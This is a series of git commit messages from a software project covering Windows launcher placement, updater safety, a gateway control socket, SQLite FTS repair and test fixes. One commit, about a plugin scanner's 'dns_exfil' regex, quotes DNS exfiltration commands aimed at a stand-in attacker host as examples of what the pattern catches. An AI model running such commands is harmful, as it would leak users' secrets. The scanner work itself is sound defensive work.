On top of @686f6c61's premise-corrected #76745:
- _looks_like_desktop_control_plane now uses the parser-derived
_hermes_holder_subcommand instead of substring matching — the
#90778/#91869 class ('-m dashboard chat' and 'kanban --preserve-cache'
argv no longer read as control planes). Regression test added,
sabotage-verified (reverting to substrings fails it).
- Live E2E (this host, real processes + real spawn ledger): live
supervised serve owns lifecycle; killed spawner (orphan) does not;
dead serve entry excluded; empty ledger does not.
- Live Windows E2E for the wine2e lane: real self-registered ledger
entry suppresses the actual cold-start plan; dead serve restores it;
holder-scan fallback rung proves the token classifier live.
Co-authored-by: 686f6c61 <github@00b.tech>
Vestigial autostart is not proof the user wants a standalone gateway
run. When Desktop currently supervises this install's control plane,
the updater must not spawn a competing messaging daemon. Serve is not
treated as gateway-equivalent.
findExistingCanonicalChat() swallowed every lookup error and returned
null — indistinguishable from 'this bot has no Bot Chat yet' — so a
transient RPC failure against a just-restarted backend (the exact
post-desktop-update window) sent createCanonicalChat() straight to
session.create, minting a fresh 'Bot Chat' while the real one (data
intact, hidden) still held the canonical title. Users experienced this
as bots losing all context after every desktop update.
The lookup now fails CLOSED: a failed registry consultation throws,
both open paths surface their existing 'try again' toast, and
session.create can never fire off an unknown ownership state.
Tests: two new VM-executed regression tests (sabotage-verified — both
fail with the old fail-open catch); hide-bot-chats source-shape regex
updated for the new layout. 364/364 plugin tests green.
Both failed only in the full Linux suite, which the targeted local
battery never ran:
- test_update_zip_two_phase.py's AST guard (#76105) flags any code
literal "Scripts" in hermes_cli as an open-coded venv layout.
migrate_windows_bin_path's legacy PATH key now derives it via
venv_bin_dir(root / "venv", windows=True) — same value, canonical
helper. The literal `venv` component stays: the key must match what
the pre-#83797 installer wrote to the registry, not where the venv
lives now.
- The managed-bin marker tests built expected PATH entries from
tmp_path, so on a POSIX host they compared forward-slash strings
against the backslash markers and could never match. Markers match
Windows registry PATH entries, so the tests now feed Windows-shaped
literals — host-independent, same contract.
CI flake mechanism (PR #92617 red, reproduced standalone): tests plant
fake botocore modules via patch.dict; when the REAL botocore.exceptions
is first imported in an interpreter state where a fake parent is (or
was) installed, its 'from botocore.vendored import requests' resolves
against a module with no __path__ and every exception test in the worker
dies with "No module named 'botocore.vendored'" — ordering-dependent,
so green locally, red in CI workers.
Defenses (both, in depth):
- test_bedrock_adapter.py pre-imports the real botocore.exceptions at
module scope, before any test can stub sys.modules — later imports are
cache hits that can never re-execute the vendored import under a
poisoned parent. Proven standalone: fake-parent repro fails without
the pre-import, succeeds with it.
- autouse _boto_sys_modules_hygiene fixtures in all three files that
plant fake boto* modules (adapter, integration, model-picker):
snapshot every boto* sys.modules entry before each test, evict+restore
after — no stub window can leak state into a later test regardless of
worker ordering.
- importorskip targets botocore.exceptions (the module the tests
actually need) instead of bare botocore, so a torn install skips
instead of erroring.
148/148 across the four affected suites.
The #87331 remaining half: when hermes.exe (or a sibling shim) could not
be renamed aside, the updater printed a warning and ran the installer
anyway — which died partway on the same locks and stranded the venv
between versions.
- _run_quarantined_install gains strict_quarantine: any shim whose
rename failed every retry aborts BEFORE the install command runs
(successful renames rolled back), raising ShimQuarantineError.
- The update dependency sync passes strict_quarantine=True. The update
boundary turns the error into a refusal: defer via the
update-incomplete marker, exit 2 (recorded as refused by the receipt
net), never ZIP-fallback. Post-sync repair installs keep warn-and-try
(their venv is already mutated; refusing buys nothing).
- The recovery installer (_install_repair._run_install_cmd) is strict
unconditionally: marker survives, next launch retries after the
holder exits.
- Live Windows E2E for the wine2e lane: a real child holds hermes.exe
without FILE_SHARE_DELETE (the exact field lock shape), strict path
refuses with zero installer invocations, releases roll back, and the
same path proceeds once the holder exits.
Sabotage-verified: reverting the strict wiring makes both fail-closed
tests fail.
PR #92092 fixed the same vanished-launcher bug by restoring copies into
the legacy in-checkout hermes-agent\bin from the update tail. That
location is what this branch removes: untracked files there are swept
by the update autostash on every cycle (restore/sweep treadmill, plus a
parked stash entry per update under --keep-stash), and unconditional
exe copies break on relocatable venvs ('uv trampoline failed to
canonicalize script path'). This branch's managed-binary-dir layout
supersedes both mechanisms, so the merge resolves to it:
- drop _sync_windows_cli_launchers and its _ensure_acp_launcher call
(Windows staging/repair lives in ensure_windows_bin_launchers at
process start and migrate_windows_bin_path in the update tail);
_ensure_acp_launcher is a Windows no-op again
- keep #92092's genuinely better installer semantics: staging stays in
a dedicated Install-HermesCommandLaunchers function that throws
BEFORE any PATH mutation when the required launcher cannot be staged
and verified -- previously Set-PathVariable could put an empty dir on
PATH and still print 'hermes command ready'. Reworked for this
branch's layout: caller passes the destination ($HermesHome\bin),
launcher form follows the venv (exe copy vs .cmd delegator), and the
verify step accepts either form
- rework #92092's AST-lifted PowerShell test for the new function
signature, keeping its fail-before-PATH-mutation assertions and
adding relocatable-venv form-selection coverage
- drop tests/hermes_cli/test_windows_cli_launcher_repair.py (pinned the
superseded in-checkout mechanism; equivalent and broader coverage
lives in tests/hermes_cli/test_ensure_windows_bin_launchers.py)
- bind under umask 0o177 so the socket is never world-connectable, even
pre-chmod (review pt 3)
- verb handlers run in an executor: state-file reads stay off the
adapter event loop (pt 2)
- inventory dedupes one multiplex gateway answering identify for several
homes — one runtime record per pid, with regression test (pt 1)
- v1 wire contract (one request per connection) documented in the module
docstring (pt 5); /tmp-unwritable skip in the short-home test
Live-verified: perms 600 at bind, identify 4.3ms via executor path, 20
rapid queries healthy.
First windows-latest run proved the design premise in miniature: identify
answered pid 616 while Popen.pid said 8000 — uv's Windows python.exe is a
trampoline that spawns the real interpreter as a child, so the spawner's
PID view is wrong and the process's self-declaration is right. Assert
against the child's printed os.getpid(); use taskkill /T for teardown.
CI runners put pytest tmp roots past sun_path, which routed every test
home through the fallback: two tests assumed in-home binding. Tests now
assert against the resolved bind location, and the fallback itself
prefers /tmp when tempfile.gettempdir() is too deep to fit sun_path.
Real child process binding the real pipe via the proactor loop with the
default handlers; real sync client; real collect_fleet_versions consumer;
kill-and-fallback proof. Skipped everywhere except a real Windows host.
The gateway now creates a local control socket at startup (Unix domain
socket at $HERMES_HOME/gateway.sock with a pointer-file fallback for
long paths; named pipe on Windows) and answers versioned JSON verbs:
- identify: pid, profile, hermes_home, code_sha/code_version (#91283
stamps, now queryable live), self-declared supervisor kind, start_time
- status: the live runtime-status payload, answered by the process itself
Bound immediately after the PID-file O_EXCL claim (the moment the
process becomes the authoritative gateway for its HERMES_HOME), removed
on clean shutdown; a successor clears any stale socket on bind. Strictly
non-fatal: bind failure only means consumers use the old path.
Consumers migrated (observability only, scan layer demoted to fallback,
never deleted):
- collect_fleet_versions() (post-update fleet matrix): prefers a live
identify answer over gateway_state.json; entries carry source=socket
- collect_runtime_inventory() (hermes update --plan): prefers the
socket, and takes the gateway's own supervisor declaration instead of
inferring it from PID scans
Old gateways mid-upgrade, crashed processes, and bind failures behave
exactly as before. Never a TCP port; filesystem/pipe ACLs are the auth
boundary (0600 socket).
Part of #91277 (fleet-update reliability). Design: #92091.
The PR narrowed _is_fts_write_corruption_error to only match FTS5-specific
'fts5: corrupt structure record' errors, dropping the generic 'database disk
image is malformed' match. But FTS shadow table corruption (the common case)
raises the generic error on SQLite < 3.53, not the FTS5-specific one. This
broke FTS self-heal for 10 existing tests and for users on older SQLite.
Restore the generic match via is_malformed_db_error. Safety is preserved
because the FTS rebuild only touches derived indexes — if the damage is
actually in a canonical B-tree, the rebuild itself fails and the write
propagates.
Also restore the original test assertion and remove the
test_generic_malformed_write_fails_closed test whose premise (generic
corruption should not trigger FTS rebuild) was wrong for the FTS self-heal
path.
The dns_exfil pattern matched the 'host' DNS command inside flag names
like llama.cpp/vllm's --host 127.0.0.1 --port $PORT, so any plugin
shipping a .sh launcher script was blocked as dangerous. A negative
lookbehind (?<![-/]) excludes flag/path contexts while real DNS-lookup
exfiltration (host $SECRET.attacker.example, nslookup $X, dig $(...))
still trips the pattern.
Salvaged from PR #92382 (regex fix + regression test); scan-scoping
half rejected separately.
os.geteuid() does not exist on Windows, so collecting the module
crashed with AttributeError before any test ran. Branch on
hasattr(os, "geteuid") the same way the code under test does.
Every uninstall mode deletes the code checkout, but the launchers in
the managed binary dir (%LOCALAPPDATA%\hermes\bin) live outside it and
survived -- so `hermes` in a new terminal resolved to a launcher whose
venv target was gone and errored, which reads worse than
command-not-found.
remove_windows_bin_launchers deletes both launcher forms (.exe/.cmd)
from the managed binary dir in every uninstall mode, anchored on the
default Hermes root so profile sessions cannot redirect the sweep into
profiles\<name>\bin. When the uninstall itself runs through the
launcher, that exe is mandatory-locked against deletion but not rename
(the same fact _quarantine_running_hermes_exe relies on), so it falls
back to renaming the launcher aside.
The managed uv (uv*.exe) in the same dir survives, and the hermes\bin
PATH entry is swept only on a full wipe from the default root
(include_managed_bin) -- a keep-data uninstall keeps the still-working
uv resolvable for reinstalls.
A lockstep test parses install.ps1's staging loop so the swept names
cannot drift from the staged names silently.
The installer staged the hermes/hermes-acp launcher copies at
hermes-agent\bin -- inside the git working tree -- and put that dir on
the user PATH (#84452). The update command's pre-pull autostash
(git stash push --include-untracked) swept those untracked, unignored
copies off disk, and once the desktop updater stopped re-applying
stashes (--keep-stash, 5dd221d442) nothing restored them: `hermes`
stopped resolving in every new terminal on every desktop-updated
install.
Move the canonical launcher home to the managed binary dir
(%LOCALAPPDATA%\hermes\bin, next to the managed uv) -- outside the
checkout, where no git operation can ever touch it. The dir is
per-machine and shared by every profile, so all anchoring uses
get_default_hermes_root(), never HERMES_HOME (which points inside
profiles\<name> under `hermes -p`).
The copy design also had a second latent break: managed-uv rebuilds
create relocatable venvs, and a relocatable venv's exe trampoline
resolves relative to its own location -- a copy outside venv\Scripts
dies with 'uv trampoline failed to canonicalize script path'. Launcher
form now depends on the venv (lockstep in install.ps1 and
_install_repair.py): exe copy for normal venvs, a .cmd delegator
invoking the in-venv exe by absolute path for relocatable ones. Either
form counts as present, so pre-rebuild exe copies are left alone.
Delivery to the existing fleet, per cohort:
- already-broken installs cannot run the CLI, so an import-time heal in
hermes_cli.main (ensure_windows_bin_launchers) re-stages missing
launchers when the desktop app spawns its backend -- the one channel
that still reaches them. Gates fail toward inaction: canonical dir
only for the managed clone, legacy hermes-agent\bin only while the
user PATH still resolves through it (some pre-managed-uv installs
have no hermes\bin PATH entry; the legacy re-stage is what fixes
those). Staging-name + os.replace keeps concurrent process starts
from tearing a launcher; the helper never raises.
- healthy old-layout installs migrate in the update tail
(migrate_windows_bin_path): stage canonical launchers, verify them
BEFORE touching the registry, prepend hermes\bin to the user PATH,
strip the legacy entries (hermes-agent\bin and venv\Scripts, #83797),
preserving REG_EXPAND_SZ and raw %VARS%. The legacy dir's files stay
on purpose -- configs holding absolute launcher paths keep working;
only the sweepable PATH resolution route goes.
- fresh installs get the new layout from install.ps1 directly.
/bin/ is gitignored so the one update that DELIVERS this fix cannot
sweep pre-migration launchers a final time under the old rules; the
gitignore line, the legacy re-stage branch, and the update-tail call
are transition machinery with a named expiry once the fleet has
migrated.
Also rewrites _ensure_acp_launcher's stale Windows paragraph to match
(raw docstring fixes its invalid \S escape) and updates the Windows
native docs to the new layout, with a docs<->installer parity test.
Follow-up to the cherry-picked cleanup: the default.tar.gz profile export
was also carried into published container images by the Dockerfile's
'COPY . .' layer because .dockerignore had no matching pattern. Anchor
the .gitignore rules to repo root (per review feedback on #91712) and
add the same set + /*.tar.gz to .dockerignore so root archives can never
reach an image layer again.
These were committed to the repo root but are build/debug byproducts:
- log.txt: empty 0-byte file
- sqlite_leak_fix.png: unreferenced 832KB image
- default.tar.gz: 1.96MB, only used as a test fixture OUTPUT (tests write it
to a temp dir, never read from repo root)
Add ignore rules so they cannot be re-committed. Part of audit cleanup
(HA-D11-001 / HA-D3-001).
Two follow-up layers on top of the salvaged runtime-boundary guard (#87871):
- coalesceToolOnlyAssistants now folds via concatToolPartsUnique, dropping an
incoming tool-call part whose toolCallId the predecessor already carries.
Two individually-clean rows sharing an id (structural carry-over re-attaching
a cached row's calls) no longer become one crashing message — and no longer
render the same call twice. Root-cause analysis by @marketing2981 (#87857).
- loadTranscriptTail repairs a poisoned persisted tail on read; installs
already carrying a duplicate in hermes.transcript-tail.v1:* stop
crash-looping after upgrade instead of re-deriving the same collision
every launch.
- Regression tests for all three layers, incl. the end-to-end repository link
test (from #92093 by @RasputinKaiser) and the cross-message ids-stay-
untouched contract (per-response tool numbering, e.g. Kimi — #90545 by
@M7MMAD-OMAR). Each test sabotage-verified against its reverted layer.
A message whose content carries two tool-call parts with the same
toolCallId makes assistant-ui's useResources throw
"Duplicate key toolCallId-<id> in useResources", which the workspace
error boundary turns into a renderer crash loop that blanks the window.
The existing withUniqueToolCallIds dedup runs only on the static
toChatMessages output; the streaming reducer (which can append the same
tool-call part twice under an optimistic-update ordering) and tool-only
assistant coalescing both reach the runtime without passing through it.
Add withUniqueToolCallIdsWithinMessage and apply it in
useRuntimeMessageRepository, the single ChatMessage->ThreadMessage
boundary shared by the static and streaming paths, right where the
repeated-message.id guard already lives. The dedup is per-message (the
assistant-ui key space is per-message) and returns the same reference
when clean, so the repository's identity cache is untouched in the
common no-duplicate case.
Addresses both review findings from @egilewski on #89134:
- Non-finite values: _coerce_int now degrades int(inf) (OverflowError
previously ABORTED gateway config loading); the clamp requires
math.isfinite plus sane upper bounds (interval <=3600s, timeout
<=600s, strikes <=1000), falling back to the shutdown_watchdog
constants.
- Loader wiring: load_gateway_config builds gw_data FLAT and never
forwarded the yaml gateway: section, so loop_watchdog* keys —
including the PRE-EXISTING loop_watchdog bool documented in
config_defaults — were silently ignored on the real startup path.
Bridged with the established top-level-wins/nested-fallback pattern.
E2E: config.yaml with loop_watchdog:false + strikes:12 + interval:.inf
now yields False/12/30.0 through the real loader.
Downscope of the salvaged #89134 per review: the 3->8 default raise was
symptom tolerance for the false-positive class the off-loop heartbeat +
two-witness probe fixes at the root — fleet-wide it would only delay
genuine-wedge recovery ~2.7x. The three tuning knobs keep independent
operator value and stay:
- default max_strikes back to 3 everywhere (constant, dataclass,
from_dict fallback, floor clamp, tests)
- gateway/config.py + gateway/run.py now reference the
shutdown_watchdog DEFAULT_* constants instead of duplicating literals
in three places (drift hazard)
- knobs registered in hermes_cli/config_defaults.py alongside the
sibling gateway.loop_watchdog bool
The event-loop liveness watchdog (gateway.shutdown_watchdog) hard-exited with
code 75 after 3 consecutive missed probes (probe_interval=30s, timeout=10s,
max_strikes=3), i.e. ~90-120s of loop block. Telegram/Discord reconnect during
a network blip does synchronous socket I/O on the loop and can block it for
60-90s; these stalls self-recover (recurring fleet incidents on 2026-08-17
stalled cron dispatch ~21h via restart churn, kanban t_0f76430f).
Raise the default max_strikes 3->8 so a transient reconnect stall is tolerated
while a genuine multi-minute wedge still escalates, and expose the three
tolerance knobs via config.yaml (gateway.loop_watchdog_probe_interval_s /
_probe_timeout_s / _max_strikes) so operators can tune per deployment.
Refs: kanban t_70483f23
hermes_cli/gateway.py's restart-wait sizing (from #92175) was the only
cross-module import of an underscore-private shutdown_forensics helper.
Promote it (private alias retained for existing patchers).
Extract _FLOOD_INLINE_WAIT_CAP_SECS + _flood_cap_result so the 5s cap
and the flood_control:{wait} error contract cannot drift between the
edit path and the send path #92173 added.
The notifier watcher offloads the same class of guarded Kanban writers
(_kanban_advance/_kanban_rewind/_kanban_unsub) as the dispatcher ticks
that #92172 wrapped. Apply the same offload-boundary scrub to all 10
writer sites for uniform defense-in-depth (read-only _collect stays on
bare to_thread), and reword the helper docstrings to state the
defense-in-depth relationship to spawn isolation accurately.
Post-merge follow-up to #92173. The claim + resume-clear lived inside
the boot-send task AFTER the restart notification — itself a
flood-controllable send. If that notification outlived the restore-gate
timeout, the gate opened with zero rows claimed and the resume
scheduler replayed turns whose answers were already in the ledger,
while the background task later redelivered them too (duplicate
delivery + re-paid turn).
Split _redeliver_pending_obligations into _claim_pending_obligations
(pure DB: sweep + resume clear, awaited inline before the send task
exists) and _redeliver_claimed_obligations (network half, stays inside
the bounded task). The original name remains as a composition wrapper.
Mutation-checked: both updated gate tests fail on pre-split run.py.
Final-review follow-up: swap the bare [:25] slice for the new constant.
Behavior-identical (same 25); removes the last bare option-cap literal
in the file. ChoicePickerView feeds finite /reasoning and /fast choice
lists, so no functional change.
Final-review follow-up: replace the bare 75 in the shown-count with
_DISCORD_MODEL_SELECT_CAPACITY so it can never desync from what the
partitioned menus actually render.
- Drop the 'aborted before its tail' no-op sentence: early aborts are
intercepted by the aborted/no-progress branches and never reach the
would-grow check, so the framing overstated its relevance (2c finding).
- Test now also asserts the durable model_config copy still holds the
armed runway after the refusal — locking in the memory==disk half of
the contract, not just the in-memory value.
compress()'s successful tail zeroes _proactive_prune_rearm_tokens in
memory — correct for a committed compaction, whose boundary already broke
the prompt-cache prefix. But compress_context's anti-growth guard can then
REFUSE the result and keep the original transcript, whose cached prefix is
intact. The refusal returned with the in-memory runway still at 0 while the
durable model_config copy kept the old value, so:
- the next eligible iteration's proactive prune fired without the regrowth
interval #79640 introduced — an immediate, unthrottled cache-breaking
rewrite (#91830's bug class), and
- memory and disk disagreed until a restart silently re-armed the throttle
from the stale durable row.
The refusal branch now restores the runway from the attempt snapshot — the
same targeted restore the rotation-failure rollback already performs.
Sibling non-commit branches audited: aborted (returns before the tail
zero), no-progress (tail zero only runs after a real boundary rewrite,
which no-progress by definition lacks), empty-transcript (built-in tail
never returns []), fence-denied (full snapshot restore already covers the
runway), in-place DB failure (in-memory transcript keeps the compacted
form, so the zeroed runway is consistent with it).
Fixes the reachable half of the structural asymmetry flagged in #91830.
Spawn-time Context isolation cannot rewrite an already-running watcher task. Run dispatcher SQLite offloads in an empty Context so write_txn no longer false-trips after delegate_task, while real child callers still hit the mutation guard.